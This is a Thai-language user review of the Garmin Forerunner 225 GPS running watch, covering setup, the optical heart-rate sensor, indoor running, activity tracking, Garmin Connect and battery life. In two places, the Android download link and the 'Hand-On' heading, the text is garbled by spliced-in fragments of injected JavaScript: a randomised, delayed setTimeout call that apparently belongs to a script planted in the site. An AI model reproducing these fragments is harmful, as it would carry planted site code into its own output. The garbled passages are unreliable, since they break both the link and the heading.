สำหรับเจ้า Forerunner 225 ตัวนี้ น่าจะเป็นตัวที่หลายๆ คนเล็งกันเอาไว้ เพราะนี่ถือว่าเป็นครั้งแรกที่ Garmin ได้นำเอาระบบการวัดอัตราการเต้นของหัวใจ (Heart Rate Monitor : HRM) แบบแสง (optical) มาใช้ เพราะก่อนหน้านี้ Garmin จะใช้ HRM แบบสายคาดหน้าอกเพียงอย่างเดียว
ต้องยอมรับว่าช่วง 1-2 ปีที่ผ่านมา ตัว HRM ที่เป็นแบบแสงพัฒนาขึ้นมาดีขึ้นมาก โดยเฉพาะเรื่องความแม่นยำที่ใกล้เคียงกับแบบคาดอก เอาล่ะ เรามาดูกันว่า Forerunner 225 ของ Garmin ตัวนี้มีดีและน่าใช้กันขนาดไหน
Forerunner 225 : Open box
ในแพคเกจของ Forerunner 225 เป็นกล่องกระดาษที่แกะออกมาแล้วจะมีอุปกรณ์เพียงแค่ตัวเรือนนาฬิกาและสาย docking ที่ใช้เป็นทั้งตัวชาร์จไฟและโอนข้อมูลไปยังคอมพิวเตอร์
ตัวเรือนนั้นหน้าตาเรียกได้ว่าเหมือนกับ Forerunner 220 เลยล่ะ ต่างกันตรงที่ลวดลายบนหน้าปัดกับสายข้อมือที่เป็นสีเดียวไม่ได้เป็นแบบ 2 tone ตัวสายถอดเปลี่ยนได้ แต่สำหรับ Forerunner 225 จะมีออกมาเป็นตัวเรือนสีดำสีเดียวเท่านั้น
สายรัดข้อมือเป็นแบบรูรอบทั้งเส้น สามารถใช้ได้กับข้อมือทุกขนาด เนื้อซิลิโคนของสายนิ่มใส่สบาย พอพลิกมาด้านหลังของเรือนก็จะพบกับตัวเซนเซอร์แสงของ HRM แบบไฟ LED 2 ดวงที่เป็นการตรวจวัดแบบต่อเนื่อง และจะทำงานเฉพาะเวลาที่เรากดบันทึกการวิ่งเท่านั้น นอกจากนั้นด้านหลังจะมีขอบวงแหวนยางอยู่ด้วย ช่วยให้ตัวเรือนกระชับกับแขนมากขึ้น (ใช้ไปนานๆ ถ้าเสื่อมสามารถถอดเปลี่ยนใหม่ได้)
วัสดุตัวเรือนเป็นพลาสติกทำให้น้ำหนักเบามากแค่ 54 กรัมเท่านั้น ดีไซน์ก็ถือว่าทำออกมาเรียบๆ แต่ดูสวย ใส่แทนนาฬิกาในประจำวันได้เลย
การควบคุมหรือเลือกเมนูต่างๆ จะเป็นปุ่มกดด้นข้างตัวเรือน ที่มีปุ่ม Power, ปุ่มเลือกเมนูขึ้น-ลง, ปุ่ม Power ที่ใช้เปิดปิดเครื่องและทำหน้าที่คำสั่ง enter ในการเลือกคำสั่ง และกดเพื่อเริ่ม, พัก หรือหยุดการบันทึกการวิ่ง สุดท้ายเป็นปุ่ม back เพื่อย้อนไปในเมนูก่อนหน้า
ส่วนตัวเป็นคนชอบอุปกรณ์สวมใส่เพื่อการออกกำลังกายที่เป็นแบบปุ่มกดมากกว่าแบบจอสัมผัส ทั้งในเรื่องของการกดที่ถนัดกว่า หลายๆ รุ่นที่เป็นจอสัมผัสมีกดตอบสนองช้าและผิดพลาดบ้าง ยิ่งเวลาที่มือเปียกเหงื่อ, ฝนตก
Set Up
เปิดเครื่องมาครั้งแรกจะให้เราเลือกภาษาของเครื่องก่อนเลย (แน่นอนว่าไม่มีภาษาไทยให้เลือก) จากนั้นก็ให้เลือกหน่วยวัด (แนะนำเป็นกิโลเมตร), เลือก Time Format, เพศ, ปีเกิด, น้ำหนัก, ส่วนสูง สุดท้ายจะมีให้เลือกว่าจะเปิดการทำงาน Activity Tracker เพื่อจะเก็บข้อมูลเกี่ยวกับการเดิน, การเคลื่อนไหว และการนอนของเรา
แต่ว่าทั้งหมดยังไม่เรียบร้อยนะครับ เพราะจะต้องทำการเชื่อมต่อ Forerunner 225 กับ Garmin Connect ของเราก่อน ถ้าใครยังไม่มีแนะนำให้ไปทำการลงทะเบียนสร้างบัญชีผู้ใช้เอาไว้ก่อนเลย ส่วนการเชื่อมต่อนั้นมีด้วยกัน 2 แบบคือ
- ใช้แอพในสมาร์ทโฟน ดาวน์โหลดได้ที่ (iOS / andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}android.apps.connectmobile&hl=en” target=”_blank”>Android) โดยจะเชื่อมต่อผ่านทาง Bluetooth
- ผ่านทางคอมพิวเตอร์ จะต้องทำการลงโปรแกรม Garmin Express ก่อนแล้วเชื่อมต่อผ่านสาย USB
ส่วนตัวเลือก sync แบบต่อกับคอมแทนที่จะใช้เชื่อมต่อกับสมาร์ทโฟน เพราะว่า Forerunner 225 ไม่ได้มีฟีเจอร์พิเศษในการเชื่อมต่อกับสมาร์ทโฟนอย่างเช่นแจ้งเตือนเวลามีสายเข้าหรือ SMS ก็เลยไม่มีความจำเป็นที่จะต้องเชื่อมต่อกันตลอดเวลา ส่วนเรื่องข้อมูลการออกกำลังกายของเราก็สามารถแบ็คอัพอยู่ได้หลายวัน (ตามสเปคสามารถเก็บไว้ได้ถึง 200 ชั่วโมง) ตอนที่เอามาเสียบ sync ในคอมก็ถือเป็นการชาร์จไฟในตัวด้วย และหลังจากที่ sync แล้วเวลาในเครื่องก็จะปรับให้ตรงกับเครื่องที่ sync รวมไปถึง profile ต่างๆ ก็จะตรงกับใน Garmin Connect
*การ sync แบบไร้สายกับแอพ Garmin Connect บนสมาร์ทโฟน หลายคนเจอปัญหาเชื่อมต่อไม่ได้ (ตัวเองก็เจอเหมือนกัน) แนะนำก่อนจะเข้าไปเลือกเชื่อมต่อใน Setting ให้รีสตาร์ททั้งตัว Forerunner 225 และสมาร์ทโฟนก่อน 1 ครั้งแล้วค่อยเชื่อมต่อ และถ้าเกิดระหว่างที่ใช้ๆ อยู่ไม่สามารถเชื่อมต่อกันได้ ให้เปิดปิด Bluetooth ของสมาร์ทโฟนดู
Handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and-On
เวลาหน้าปัดปกติของ Forerunner 225 จะแสดงตัวเลขบอกเวลาเหมือนนาฬิกาทั่วไป ถ้ากดปุ่มขึ้น-ลง (ทางซ้ายล่าง) จะเลือกแสดงผลของก้าวเดิน, ระยะทาง, การเผาผลาญแคลลอรี่จากระบบ Activity Tracker ได้
สำหรับหน้าจอของ Forerunner 225 จะเป็นแบบสีที่เปิดตลอดเวลาแถมมองเห็นได้ชัดมากในที่แจ้ง แต่สำหรับที่แสงน้อยหรือเวลากลางคืนสามารถกดปุ่ม Power เพื่อเปิดไฟ backlight ดูได้
Menu
การเข้าไปดูเมนูในตัว Forerunner 225 จากปกติที่หน้าจอเราตั้งแสดงผลเป็นนาฬิกาให้กดปุ่มสีแดง (ขวาบน) 2 ครั้งเพื่อเป็นการปลดล็อค ที่หน้านี้กดปุ่มขึ้นจะเข้าไปเลือกปิด-เปิด GPS ได้ทันที ส่วนเมื่อกดลงจะเข้าไปเลือกเมนูสำหรับการฝึกฝนแบบต่างๆ (Training). ดูข้อมูลการวิ่งก่อนหน้านี้ (History), ข้อมูลสถิติต่างๆ (Records) และเมนูปรับแต่ง (Setting)
Training
เราสามารถเลือกโหมดการฝึกฝนการวิ่งได้ โดยไปจัดทำเส้นทาง Work out หรือทำปฎิทินการฝึกฝนได้ใน Garmin Connect แล้ว sync เข้ามาที่ Forerunner 225 หรือถ้าอยากฝึกแบบ Interval อันนี้สามารถปรับตั้งได้ในตัวนาฬิกาได้เลยว่าอยากจะกำหนดรอบการวิ่งการพักทุกกี่นาที
Setting
การปรับแต่งค่าการใช้งานของ Forerunner 225 จะอยู่ในนี้ทั้งหมด จะขออธิบายคร่าวๆ นะครับ
- Activity Setting : การแสดงค่าที่หน้าจอเวลาที่บันทึกการออกกำลังกาย, การแจ้งเตือน, การจับรอบวิ่งอัตโนมัติ, หยุดการบันทึกอัตโนมัติ, Auto Scroll และ Timeout
- Heart Rate Monitor : เลือกปรับการทำงานตัว HRM ของตัวเครื่อง เลือกได้ว่าจะเป็นแบบ Auto หรือปิดการใช้งาน
- Sensor : สำหรับ Forerunner 225 รองรับการเชื่อมต่อแบบ ANT+ ด้วย นั่นคือสามารถใช้คู่กับอุปกรณ์อื่นๆ ของ Garmin ได้ด้วยอย่าง Footpod และ HRM แบบสายคาดอก
- Bluetooth : เอาไว้ทำการเชื่อมต่อกับสมาร์ทโฟนโดยจะต้องลง Garmin Connect และ Login ให้เรียบร้อย และสั่ง Add Device เพื่อเชื่อมต่อเข้าด้วยกัน
- User Profile : ปรับเปลี่ยนข้อมูลส่วนตัวเหมือนกับตอนที่ Setup เครื่องครั้งแรก
- Alarm : ตั้งค่าเกี่ยวกับการเตือนระหว่างการใช้งาน
- Activity Tracking : ตั้งค่าในส่วนการเก็บข้อมูลการเคลื่อนไหวในแต่ละวัน ทั้งก้าวเดิน, การนอน, แคลลอรี่ ฯลฯ
- System : ตั้งค่าต่างๆ ในระบบของเครื่อง
Let’s Run!
เอาล่ะ หลังจากเตรียมพร้อมตระเตรียม Forerunner 225 เรียบร้อยแล้ว ก็ได้เวลาทดสอบลองใช้วิ่งกันจริงๆ ซะที สถานที่ทดสอบเป็นรอบสวนนวมินทร์ภิรมย์ ระยะทางประมาณ 2 กิโลเมตร เรื่องความแม่นยำของ GPS นั้นเรียกว่ายังดีตามมาตรฐานของ Garmin ไม่มีแกว่งมีพลาดหลุด
เชื่อว่าหลายคนอยากจะรู้เรื่องของความแม่นยำของ HRM แบบแสงใน Forerunner 225 ว่าเป็นอย่างไร จากผลที่ได้นั้นสำหรับผมแล้วถือว่าโอเคเลย คือไม่มีการผิดพลาดแบบสัญญาณขาดหายหรือว่ากระโดดเพี้ยนเลย
ส่วนตัวไม่ได้ลองทดสอบถึงระดับที่ว่าเทียบกับเซนเซอร์แบบสายวัดคาดอก เนื่องจากมีอุปกรณ์ไม่ครบ แต่ว่าขอเอาคลิปรีวิวของต่างประเทศมาให้ชมกัน การทดสอบเป็นการเอา Forerunner 225 ทำงานเทียบกับ Forerunner 220 พร้อมสายคาดอก ผลที่ได้ออกมาแล้วเทียบกราฟกันแล้วถือว่าอยู่ในระดับที่ใกล้เคียงกันมากเลยทีเดียวล่ะ
อีกอย่างที่ค่อนข้างชอบใน Forerunner 225 คือการแสดงผล HR Zone เป็นแบบแถบสีรอบหน้าปัดแล้เป็นเข็มชี้ให้ดูว่าตอนนี้เรากำลังอยู่ในโซนไหน ซึ่งเหมาะสำหรับคนที่วิ่งและเน้นเรื่องของการคุมโซนเพราะมันดูได้ชัดเจนมาก (ระหว่างวิ่งให้กดปุ่มลงจะเข้ามาดูหน้าจอแสดง HR Zone ได้)
Indoor Running
เอาล่ะ อีกฟีเจอร์ที่สารภาพตามตรงว่าตอนแรกโง่อยู่นานกับการใช้งานวิ่งในร่มหรือบน Treadmill เพราะหาดูแล้วมันไม่มีให้เลือกโหมด In door เลย ครั้งแรกลองแบบกดบันทึกไปตามปกติ ปรากฎว่ามันดันจับสัญญาณดาวเทียมได้ ผลก็คือวิ่งไปร่วม 20 นาทีแต่ได้ระยะทางแค่ 500 ม. แถมแผนที่ก็คือขึ้นมามั่วซั่วไปหมด
คราวนี้ก็เลยทดสอบอีกครั้งแต่คราวนี้ปิดสัญญาณ GPS ไปเลย ปรากฎว่าคราวนี้จะใช้ Accelometer มาคำนวนจังหวะการแกว่งแขนของเราออกมาเป็นระยะทางได้ ซึ่งเทียบกับระยะที่ขึ้นบน Treadmill ก็ถือว่าค่อนข้างใกล้เคียงกัน
สรุปคือถ้าต้องการวิ่งในร่มนั้น ให้ทำการปิด GPS ซะ เมื่อบันทึกเสร็จแล้วค่อยเข้าไปใน Garmin Connect เพื่อเปลี่ยนจาก Running มาเป็น Treadmill เท่านี้ก็เรียบร้อยแล้ว

Activity Tracker
ฟีเจอร์ที่ติดตั้งมาให้ด้วยอันนี้ ส่งผลให้ผมใส่มันติดตัวตลอดเวลาทั้งวันและในเวลานอนด้วยเลย เพราะนอกจากจะเอาไว้ใช้บันทึกการวิ่งแล้ว ยังสามารถเก็บข้อมูลเกี่ยวกับการเดิน, การเคลื่อนไหว และการนอนของเราได้ ซึ่งตามปกติแล้วฟีเจอร์นี้จะเป็นของตัว Vivofit ที่ราคาอยู่เกือบๆ 4,000 บาท เรียกได้ว่าเอามาใส่ให้ใน Forerunner 225 ได้ใช้กันฟรีๆ ไม่ต้องไปซื้อเพิ่ม

นอกจากข้อมูลการเคลื่อนไหวและการนอนที่จะเก็บแล้วเอาไปประมวลผลทำสถิติให้ใน Garmin Connect แล้ว ยังมีระบบการแจ้งเตือนในเวลาที่เรานั่งนิ่งเป็นเวลานานๆ โดยที่หน้าจอจะมีแถบสีแดงด้านรอบของจอค่อยๆ ขึ้นมา ระยะเวลาประมาณ 1 ชั่วโมง มันจะสั่นเตือนบอกว่าเรานั่งนานเกินไปแล้ว ให้ลุกขึ้นเดินหรือเคลื่อนไหวบ้าง

Garmin Connect
อีกสิ่งสำคัญที่ Garmin ทำออกมาและพัฒนาอย่างต่อเนื่องนั่นก็คือส่วนของระบบเก็บข้อมูลและประมวลผลการวิ่งและออกกำลังกายของเรา ที่ปัจจุบันสามารถเก็บข้อมูลได้ถึงอาหารที่เราทานในแต่ละวัน (เชื่อมต่อกับ Myfitnesspal) และยังมี Community สำหรับสื่อสารกับเพื่อนที่ใช้อุปกรณ์ของ Garmin เหมือนกัน และล่าสุดตอนนี้มีส่วนของ Segment ที่มีข้อมูลเส้นทางวิ่งหรือปั่นจักรยานที่มีคนเคยทำสถิติเอาไว้
การเข้ามาใช้งานใน Garmin Connect จะได้ทั้งทางแอพในสมาร์ทโฟนและผ่านทางเว็บบราวเซอร์ในคอมพิวเตอร์ เลือกใช้กันได้ตามสะดวก
ในการเก็บค่า Activity ในการวิ่งของเรานั้น นอกจากจะเก็บเรื่องของระยะทาง,เวลา และอัตราการเต้นของหัวใจแล้ว ยังเก็บค่าของ Evevation (ขึ้นลงเนิน), Pace และค่า Running Dynamics ที่แสดง Cadence รอบจังหวะก้าว (วัดเป็น spm และแบ่งโซนให้ด้วย)
เรียกได้ว่าเก็บข้อมูลให้แบบละเอียดยิบ เพื่อเอามาดูวิเคราะห์และพัฒนาทักษะการวิ่งของเราให้ดีขึ้นได้


Performance
การใช้งานโดยรวมแล้วถือว่าน่าพอใจมาก เรื่องของแบตเตอรี่ก็เป็นอีกจุดที่ทำออกมาได้ดี จากการทดสอบใช้งานในการชาร์จแบตเต็ม 100% ครั้งแรก ทดสอบใช้วิ่งรวมเป็นเวลาประมาณ 4-5 ชั่วโมง เปิดใช้งาน HRM แบบแสงในเวลาวิ่ง, เชื่อมต่อ Bluetooth กับสมาร์ทโฟน และเปิดใช้งาน Activity Tracker ผ่านไป 1 อาทิตย์ แบตเตอรี่ยังเหลืออยู่ถึง 30%
ตามสเปคแบตเตอรี่ที่ Garmin ระบุไว้ สามารถใช้งานเป็นนาฬิกา (watch mode) ได้นาน 4 สัปดาห์ และใช้งานเป็นนาฬิกาวิ่ง GPS+ HRM ได้ 10 ชั่วโมง เรียกได้ว่าไม่ต้องเสียเวลาชาร์จกันบ่อยๆ เหมือนกับนาฬิกาบางยี่ห้อที่ต้องชาร์จใช้กันแบบวันต่อวันเลย
สรุป
สำหรับการใช้งานเรื่องวิ่งยังทำได้ดีตามมาตรฐานของ Garmin ในเรื่องความแม่นยำ วัสดุและการออกแบบก็ถือว่าดีสมราคา และที่หลายคนเป็นห่วงเรื่องความแม่นยำของ Heart Rate Monitor แบบ Optical นั้นจะแม่นและเสถียรแค่ไหน จากการทดสอบแล้วถือว่าโอเคใช้ได้เลย
Forerunner 225 เหมาะสำหรับคนที่เน้นใช้งานเพื่อการออกกำลังกายด้วยการวิ่งเป็นหลัก รองรับทั้งการวิ่งบนถนนและในร่ม และสนใจเรื่องการควบคุมโซนของ Heart Rate ในการออกกำลังกาย เพราะว่าตัวเดียวครบไม่ต้องใช้เซนเซอร์แบบคาดหน้าอกที่อาจจะรู้สึกอึดอัดและน่ารำคาญ
แต่ถ้าหากคุณต้องการจริงจังกับการวิ่งมากกว่านี้ถึงระดับวัด VO2max หรือต้องการใช้ร่วมกับการออกกำลังกายอย่างอื่นเช่น ปั่นจักรยาน Forerunner 225 น่าจะไม่เพียงพอสำหรับคุณ แนะนำให้เป็นรุ่นที่สูงกว่าอย่าง Forerunner 620, 920XT หรือไม่ก็ Fenix 3 จะดีกว่า

จุดเด่น : HRM แบบแสงทำงานได้น่าประทับใจไม่คลาดเคลื่อน, แบตอึดมากและชาร์จได้เต็มค่อนข้างรวดเร็ว, ดีไซน์สวย, วัสดุดี, น้ำหนักเบา, มี Activity Tracker เหมือนใน Vivofit ติดตั้งมาให้ด้วย
จุดด้อย : การวิ่งในร่มน่าจะมีเป็นเมนูให้เลือกเลย ไม่ต้องไปปิดเปิด GPS ให้เสียเวลา, ไม่มีฟีเจอร์ประเภทแจ้งเตือนจากสมาร์ทโฟน, สีมีให้เลือกแค่สีเดียว